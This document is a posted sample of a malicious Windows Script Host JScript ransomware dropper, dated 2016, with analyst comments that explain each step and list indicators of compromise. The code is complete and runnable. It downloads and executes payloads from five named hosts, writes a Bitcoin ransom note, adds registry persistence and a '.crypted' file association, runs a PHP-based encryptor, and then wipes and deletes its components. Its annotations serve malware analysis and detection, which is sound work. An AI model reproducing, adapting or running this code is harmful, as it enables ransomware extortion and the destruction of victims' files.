dynamoo

Malicious Javascript

Aug 2nd, 2016
  // Analyst annotations: comments only. The code is as posted, re-broken one statement
  // per line; the paste's "1." gutter number and its line wrapping are dropped.
  //
  // JScript for Windows Script Host (it relies on the WScript object). What the script
  // visibly does:
  //   1. Skips everything if %TEMP%\a.txt already exists (used as an "already ran" marker).
  //   2. Fetches five payloads over plain HTTP from the hosts in `ll`
  //      (GET /counter/?ad=...&id=...&rnd=...), saving them under %TEMP%:
  //        n=1,2 -> a1.exe / a2.exe, each executed immediately
  //        n=3   -> a.exe      n=4 -> php4ts.dll      n=5 -> a.php
  //   3. If a.exe, php4ts.dll and a.php are all present: writes the ransom note to a.txt,
  //      adds registry persistence and a ".crypted" file association, copies the note to
  //      the Desktop as DECRYPT.txt, runs `a.exe "a.php"` and waits, then overwrites and
  //      deletes a.php, a.exe and php4ts.dll.
  // No file-encryption logic appears in this script itself; that is presumably done by
  // a.exe (likely a PHP interpreter, going by the php4ts.dll name) executing a.php. The
  // "RSA-1024" statement is ransom-note text only; nothing here confirms it.
  //
  // Indicators visible in this sample, for detection and triage:
  //   - files in %TEMP%: a.txt, a.exe, a1.exe, a2.exe, a.php, php4ts.dll
  //   - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value "Crypted"
  //   - HKCR\.crypted and HKCR\Crypted\shell\open\command
  //   - DECRYPT.txt on the Desktop
  //   - HTTP requests to /counter/?ad=<address>&id=<id>&rnd=<digits> and /counter/?a=<address>
  //   - a script host spawning %COMSPEC% with REG ADD / copy / DEL and executables from %TEMP%

  // Per-sample parameters: `id` and `ad` are sent in every download request; `ad` is also
  // printed in the note as the payment address and `bc` as the amount in BTC.
  var id="LRYB9RcpANpqAc9lNDOe_7o65Gns30h8ZhRx1DBunTW-YHmZvSONzPHomHt9FRlRl53IG-8U9s47bw";
  var ad="15R1q8XJmfZUGNy4cWGocZBEVeMsXfECpZ";
  var bc="0.54235";
  // Index of the first host to try; updated to the last host that served a payload.
  var ld=0;
  // Char code 34 is a double quote and 92 a backslash; building them at run time keeps
  // those characters out of the string literals below.
  var cq=String.fromCharCode(34);
  var cs=String.fromCharCode(92);
  // Download hosts, tried in order (presumably compromised third-party sites -- not
  // established by the script itself).
  var ll=["opros.mskobr.ru","alacahukuk.com","www.ortoservis.ru","aksoypansiyon.com","samurkasgrup.com"];
  var ws=WScript.CreateObject("WScript.Shell");
  // Base path %TEMP%\a -- every dropped file name is derived from it.
  var fn=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"a";
  var pd=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"php4ts.dll";
  var xo=WScript.CreateObject("Msxml2.XMLHTTP");
  var xa=WScript.CreateObject("ADODB.Stream");
  var fo=WScript.CreateObject("Scripting.FileSystemObject");
  // Marker check: the note file is written only after a successful download stage, so
  // its presence stops the script from running again.
  if (!fo.FileExists(fn+".txt")) {
    // Stage 1: five download rounds (n = payload number), each walking the host list
    // from the last known-good index.
    for(var n=1;n<=5;n++) {
      for(var i=ld;i<ll.length;i++) {
        var dn=0;
        try {
          // Synchronous GET (third argument false). "&rnd="+i+n concatenates the two
          // numbers as digits rather than adding them, because the left operand is a string.
          xo.open("GET","http://"+ll[i]+"/counter/?ad="+ad+"&id="+id+"&rnd="+i+n, false);
          xo.send();
          if(xo.status==200) {
            xa.open();
            xa.type=1; // 1 = binary stream
            xa.write(xo.responseBody);
            // Only bodies larger than 1000 bytes count as a payload (presumably to
            // reject error pages or empty responses).
            if(xa.size>1000) {
              dn=1;
              // saveToFile mode 2 overwrites an existing file.
              if(n<=2){
                // Payloads 1 and 2 are executed as soon as they are saved
                // (window style 1, no wait); a launch failure is ignored.
                xa.saveToFile(fn+n+".exe",2);
                try{ws.Run(fn+n+".exe",1,0);}catch(er){};
              }
              else if(n==3){xa.saveToFile(fn+".exe",2);}
              else if(n==4){xa.saveToFile(pd,2);}
              else if(n==5){xa.saveToFile(fn+".php",2);}
            };
            xa.close();
          };
          // Remember the host that worked and move on to the next payload.
          if(dn==1){ld=i;break;};
        } catch(er){}; // any request or stream error is swallowed; the next host is tried
      };
    };
    // Stage 2 runs only if the interpreter, its DLL and the script were all fetched.
    if(fo.FileExists(fn+".exe") && fo.FileExists(pd) && fo.FileExists(fn+".php")) {
      // Ransom note, written to %TEMP%\a.txt (this also creates the marker file).
      var fp=fo.CreateTextFile(fn+".txt",true);
      fp.WriteLine("ATTENTION!");
      fp.WriteLine("");
      fp.WriteLine("All your documents, photos, databases and other important personal files");
      fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
      fp.WriteLine("To restore your files you have to pay "+bc+" BTC (bitcoins).");
      fp.WriteLine("Please follow this manual:");
      fp.WriteLine("");
      fp.WriteLine("1. Create Bitcoin wallet here:");
      fp.WriteLine("");
      fp.WriteLine("      https://blockchain.info/wallet/new");
      fp.WriteLine("");
      fp.WriteLine("2. Buy "+bc+" BTC with cash, using search here:");
      fp.WriteLine("");
      fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
      fp.WriteLine("");
      fp.WriteLine("3. Send "+bc+" BTC to this Bitcoin address:");
      fp.WriteLine("");
      fp.WriteLine("      "+ad);
      fp.WriteLine("");
      fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
      fp.WriteLine("");
      // The note lists every host from `ll` again, here with the query "?a=" instead of "?ad=".
      for (var i=0;i<ll.length;i++) {
        fp.WriteLine("      http://"+ll[i]+"/counter/?a="+ad);
      };
      fp.WriteLine("");
      fp.WriteLine("5. Run decryptor to restore your files.");
      fp.WriteLine("");
      fp.WriteLine("PLEASE REMEMBER:");
      fp.WriteLine("");
      fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
      fp.WriteLine("      - Nobody can help you except us.");
      fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
      fp.WriteLine("      - Your files can be decrypted only after you make payment.");
      fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
      fp.Close();
      // All commands below go through %COMSPEC% /c with window style 0 (hidden).
      // Persistence: Run value "Crypted" holds the path of the note, so the note is
      // presumably opened at each logon.
      ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCU"+cs+"SOFTWARE"+cs+"Microsoft"+cs+"Windows"+cs+"CurrentVersion"+cs+"Run"+cq+" /V "+cq+"Crypted"+cq+" /t REG_SZ /F /D "+cq+fn+".txt"+cq,0,0);
      // File association: ".crypted" maps to the class "Crypted", whose open command is
      // notepad.exe with the note path, so opening such a file displays the note.
      ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCR"+cs+".crypted"+cq+" /ve /t REG_SZ /F /D "+cq+"Crypted"+cq,0,0);
      ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCR"+cs+"Crypted"+cs+"shell"+cs+"open"+cs+"command"+cq+" /ve /t REG_SZ /F /D "+cq+"notepad.exe "+cs+cq+fn+".txt"+cs+cq+cq,0,0);
      // Copy the note to two candidate Desktop locations as DECRYPT.txt.
      ws.Run("%COMSPEC% /c copy /y "+cq+fn+".txt"+cq+" "+cq+"%AppData%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0);
      ws.Run("%COMSPEC% /c copy /y "+cq+fn+".txt"+cq+" "+cq+"%UserProfile%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0);
      // Runs a.exe with a.php as its argument; the final 1 makes the script wait for it
      // to finish. This is the only call here that blocks.
      ws.Run("%COMSPEC% /c "+fn+".exe "+cq+fn+".php"+cq,0,1);
      // Show the note to the user.
      ws.Run("%COMSPEC% /c notepad.exe "+cq+fn+".txt"+cq,0,0);
      // Cleanup: a.php is first overwritten with 1000 lines of the address (presumably
      // to hinder recovery of the script from disk), then the three dropped components
      // are deleted. a.txt, a1.exe and a2.exe are not removed by this script.
      var fp=fo.CreateTextFile(fn+".php",true);
      for(var i=0;i<1000;i++){fp.WriteLine(ad);};
      fp.Close();
      ws.Run("%COMSPEC% /c DEL "+cq+fn+".php"+cq,0,0);
      ws.Run("%COMSPEC% /c DEL "+cq+fn+".exe"+cq,0,0);
      ws.Run("%COMSPEC% /c DEL "+cq+pd+cq,0,0);
    };
  };